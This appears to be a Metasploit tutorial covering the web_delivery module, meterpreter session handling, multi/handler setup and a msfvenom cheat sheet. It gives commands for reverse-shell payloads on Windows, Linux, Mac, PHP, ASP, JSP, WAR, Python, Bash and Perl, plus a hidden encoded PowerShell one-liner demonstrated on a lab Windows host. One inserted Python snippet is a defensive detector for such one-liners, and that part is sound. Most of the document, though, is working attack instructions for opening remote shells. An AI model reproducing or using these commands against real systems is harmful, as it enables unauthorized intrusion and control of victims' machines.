In a terminal, start msfconsole.
Use the exploit/multi/script/web_delivery module:
use exploit/multi/script/web_delivery
Once inside the module, the following commands configure the attack:
show targets  # list the selectable target types
set target <number|target type>  # choose the target
show payloads  # list usable payloads; once a target is chosen, only the matching payloads are shown
set payload <number|payload>  # choose the payload
show options  # show the module's required parameters and the values currently set
set lhost <ip>  # listener IP (your own host); needed for the reverse connection
set lport <port>  # listener port
set rhost <ip>  # target host IP
set rport <port>  # target host port
run / exploit  # run the module
Here is a demonstration against Windows; the precondition is that you can already execute commands on the target host.
Attacking host, Kali: 192.168.52.128; target machine: Windows 11.
Copy the command the module prints:
powershell.exe -nop -w hidden -e <base64-encoded payload, omitted here>
Run it on the target host.
After it runs the console may appear to hang; just press Enter.
Then type sessions to check whether the target host is now under control.
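The one-liner web_delivery prints has a very recognisable shape on the defender's side (PowerShell, no profile, hidden window, encoded command). The following Python detector is an added example, not code from the original post: it flags process-creation log lines with that shape and decodes the -EncodedCommand argument (base64 of UTF-16LE) so an analyst can read what would have run. The log format, host name and the harmless encoded script are all constructed for the demo.

```python
import base64
import re
# PowerShell accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")
HIDDEN_WINDOW = re.compile(r"(?i)\s-w(?:indowstyle)?\s+hidden\b")
NO_PROFILE = re.compile(r"(?i)\s-nop(?:rofile)?\b")
POWERSHELL = re.compile(r"(?i)\bpowershell(?:\.exe)?\b")

def decode_encoded_command(b64):
    """Return the UTF-16LE text behind an -EncodedCommand value, or None if it does not decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_command_line(cmdline):
    """Flag PowerShell that carries an encoded command plus a hidden-window or no-profile switch."""
    m = ENCODED_ARG.search(cmdline)
    r = {
        "powershell": bool(POWERSHELL.search(cmdline)),
        "encoded": m is not None,
        "hidden": bool(HIDDEN_WINDOW.search(cmdline)),
        "noprofile": bool(NO_PROFILE.search(cmdline)),
        "decoded": decode_encoded_command(m.group(1)) if m else None,
    }
    r["suspicious"] = r["powershell"] and r["encoded"] and (r["hidden"] or r["noprofile"])
    return r

def scan_log(lines):
    """Check constructed lines of the form '<ts> <host> ProcessCreate: <cmdline>'; return the hits."""
    hits = []
    for line in lines:
        _, _, cmdline = line.partition("ProcessCreate: ")
        if cmdline:
            r = analyze_command_line(cmdline)
            if r["suspicious"]:
                hits.append({"line": line, **r})
    return hits

# Constructed sample log: one line shaped like the web_delivery one-liner, carrying a harmless
# script encoded as -EncodedCommand expects (base64 of UTF-16LE), and one benign invocation.
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z host1 ProcessCreate: powershell.exe -nop -w hidden -e "
    + base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode("ascii"),
    "2024-01-01T10:00:05Z host1 ProcessCreate: powershell.exe -File C:\\scripts\\backup.ps1",
]
if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["line"], "\n  decoded:", hit["decoded"])
```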
Session-related commands:
show sessions | sessions  # list all sessions obtained
sessions -i <session id>  # interact with that session and enter the meterpreter post-exploitation module
Once inside meterpreter, do not casually leave with exit: it kills the session outright.
background  # put the current session in the background and keep it running
The exploit/multi/handler module, again using Windows as the example:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.52.128
set lport 1111
exploit -z -j  # run as a background job
The precondition is that a payload was generated with msfvenom and executed on the target host.
No example is given here; for one, see the post "msf生成木马_msfvenom -p linux/x86/meterpreter/reverse_tcp lhos-CSDN博客".
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php  # prepend the PHP open tag that the raw output lacks (pbcopy/pbpaste are macOS clipboard tools)
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl